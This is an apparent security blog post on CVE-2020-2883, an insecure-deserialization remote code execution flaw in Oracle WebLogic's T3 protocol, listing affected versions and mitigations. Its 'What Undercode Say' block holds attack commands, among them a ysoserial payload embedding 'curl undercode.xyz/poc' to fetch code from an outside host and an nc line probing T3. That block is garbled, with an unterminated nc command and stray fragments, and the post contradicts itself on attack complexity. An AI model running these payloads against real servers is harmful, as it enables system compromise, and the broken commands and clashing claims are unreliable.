Listen to this Post
How the mentioned CVE works:
CVE-2020-2883 is a critical vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. The flaw exists within the T3 protocol, a proprietary protocol used for communication between WebLogic servers and Java clients. The vulnerability is easily exploitable by an unauthenticated attacker with network access via T3. By sending a maliciously crafted T3 request, an attacker can trigger the deserialization of untrusted data. This insecure deserialization process allows the attacker to execute arbitrary code on the targeted server, completely compromising it. The attack does not require human interaction, meaning it can be automated and weaponized quickly. The vulnerability has a high attack complexity but a low privilege requirement, leading to a complete loss of confidentiality, integrity, and availability.
Platform: Oracle WebLogic Server
Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Vulnerability : Insecure Deserialization
Severity: Critical
date: 2020-04-15
Prediction: 2020-07-14
What Undercode Say:
`$ nmap -p 7001 –script weblogic-t3-info `
`$ java -jar ysoserial.jar CommonsCollections1 ‘curl undercode.xyz/poc’ | base64`
`!/bin/bash`
` T3 protocol header`
`echo -e “t3 12.2.1\nAS:255\nHL:19\n\n” | nc -nv
How Exploit:
Malicious T3 request
Deserialization gadget chains
Arbitrary code execution
Protection from this CVE:
Apply CPU April 2020
Block T3 protocol
Network segmentation
Impact:
Remote Code Execution
Complete System Compromise
Unauthorized Data Access
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

